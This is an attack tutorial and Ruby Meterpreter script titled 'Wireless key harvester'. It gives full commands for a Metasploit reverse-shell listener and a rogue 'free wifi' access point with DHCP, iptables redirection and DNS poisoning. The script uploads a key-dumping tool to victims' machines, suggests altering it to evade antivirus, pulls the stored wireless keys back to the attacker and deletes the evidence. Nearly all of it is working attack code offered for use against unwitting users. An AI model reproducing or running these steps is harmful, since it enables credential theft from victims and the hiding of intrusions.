Wireless key harvester
First we create our meterpreter exe
check this page out
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html
setup our listener
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb
set ExitOnSession false
show options
exploit -j
next setup our fake access point
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v
no we setup our dhcp server
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
setup apache server to host our exploit
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
dns redirector -- in this case dnspoison
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1
and thats it, wait for victims to connect, or forcefully disconnect them using mdk!!!!!!
--------------------------- harvester.rb ---------------------------------------
#
# Wireless key harvester using wireless key viewer"
require 'rex'
# Extract the host and port
host,port = session.tunnel_peer.split(':')
print_status("New session found on #{host}:#{port}...")
# bin -- the name of our exe
bin = "wkv.exe"
# output of wireless key viewer
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"
#destination for the keys in txt format
dest = "/home/hm/Desktop/keys/"
#upload wireless key viewer --- modify it to bypass av's
print_status("Uploading Wireless Key Viewer")
sleep(1)
client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
sleep(1)
print_status("Uploaded Wireless Key Viewer")
sleep(1)
#execute via cmd, output will be random name,
print_status("Executing wireless key viewer ")
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
print_status("bat file executed")
sleep(1)
#download keys to our keys folder
print_status("Downloading keys to keys folder ")
client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
print_status("Downloaded keys to keys folder ")
#delete uploaded files -- we can also clear logs here if we want to
sleep(1)
print_status("Deleting uploaded files ")
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
print_status("Have a nice day!!!!!! ")